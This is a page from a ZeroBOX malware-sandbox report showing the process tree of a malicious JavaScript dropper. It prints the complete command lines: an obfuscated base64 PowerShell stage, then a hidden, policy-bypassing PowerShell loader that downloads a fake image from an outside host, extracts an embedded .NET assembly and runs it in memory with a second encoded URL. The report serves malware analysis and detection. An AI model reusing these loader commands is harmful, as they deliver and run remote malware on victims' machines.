popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\3tuvq.js

    2556

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

      2696

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2800

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf